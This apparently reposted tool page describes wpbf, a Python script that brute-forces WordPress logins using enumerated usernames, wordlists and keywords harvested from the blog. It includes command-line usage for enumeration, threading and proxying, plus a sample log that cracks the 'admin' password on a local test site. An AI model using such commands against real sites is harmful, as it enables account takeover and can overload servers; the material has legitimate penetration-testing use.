wpbf - WordPress Brute Force

The script will try to login into the WordPress dashboard through the login form using a mixture of enumerated usernames, a wordlist and relevant keywords from the blog's content. If a single username is given, the script will not search for additional usernames.

When a correct username/passwords matchs, it will be logged and show on the standard output.

For faster results you can spawn threads but BE CAREFULL not to flood/DoS the site. Default settings can be changed in "config.py" and "logging.conf" files.

The wordlist must have one entry per line, a small wordlist (wordlist.txt) and plugin list (plugins.txt) are provided for testing purposes.


  • Username enumeration and detection (TALSOFT-2011-0526, Author's archive page and content parsing)
  • Threads
  • Use keywords from blog's content in the wordlist
  • HTTP Proxy Support
  • Basic WordPress fingerprint (version and full path)
  • Advance plugins fingerprint (bruteforce, discovery and version/documentation)
  • Detection of Login LockDown plugin (this plugin makes the bruteforce useless)
  • Advanced logging using Python's logging library and logging configuration file



In this example, wpbf will do a bruteforce test using the default settings (you can change the default settings in config.py). It will enumerate usernames, find keywords and plugins, use the static+generated wordlist to bruteforce each user and try to guess remote path:
$ ./wpbf.py http://localhost/wordpress/
2012-02-26 14:26:18,793 - INFO - Target URL: http://localhost/wordpress/
2012-02-26 14:26:18,844 - INFO - Checking URL and username...
2012-02-26 14:26:18,845 - INFO - Enumerating users...
2012-02-26 14:26:52,027 - INFO - Usernames: admin, test, guest
2012-02-26 14:26:54,153 - INFO - 31 plugins will be tested
2012-02-26 14:26:55,311 - INFO - 215 passwords will be tested
2012-02-26 14:26:55,369 - INFO - Starting workers...
2012-02-26 14:26:56,685 - INFO - WordPress version: 3.0.1
2012-02-26 14:26:57,570 - INFO - WordPress path in server: /var/www/wordpress/
2012-02-26 14:27:08,624 - INFO - Plugin 'akismet' was found
2012-02-26 14:27:10,292 - INFO - Plugin 'akismet' version: 2.5.5 (more info @ http://localhost/wordpress/wp-content/plugins/akismet/readme.txt)
221 tasks left / 2.1 tasks per second / 1.76min left
199 tasks left / 2.2 tasks per second / 1.51min left
172 tasks left / 2.7 tasks per second / 1.06min left
21 tasks left / 1.6 tasks per second / 0.22min left
2012-02-26 14:57:23,245 - INFO - Password 'qawsed' found for username 'admin' on http://localhost/wordpress/wp-login.php

Username enumeration only

The '-eu' or '--enumerateusers' parameter will only do username enumeration and list the usernames found
$ ./wpbf.py -eu http://www.mysite.com/blog/


You can spawn more threads to speed up the bruteforce process. Be aware that using a lot of threads can cause hangs in the server or denial of service. For this example we will spawn 23 threads:
$ ./wpbf.py -t 23 http://www.mysite.com/blog/


Using username 'john', not using keywords in the blog content for the wordlist and trough a local proxy:
$ ./wpbf.py --nokeywords -u john -p http://localhost:8008/ http://www.mysite.com/blog/

wpbf - WordPress Brute Force wpbf - WordPress Brute Force Reviewed by Zion3R on 4:54 PM Rating: 5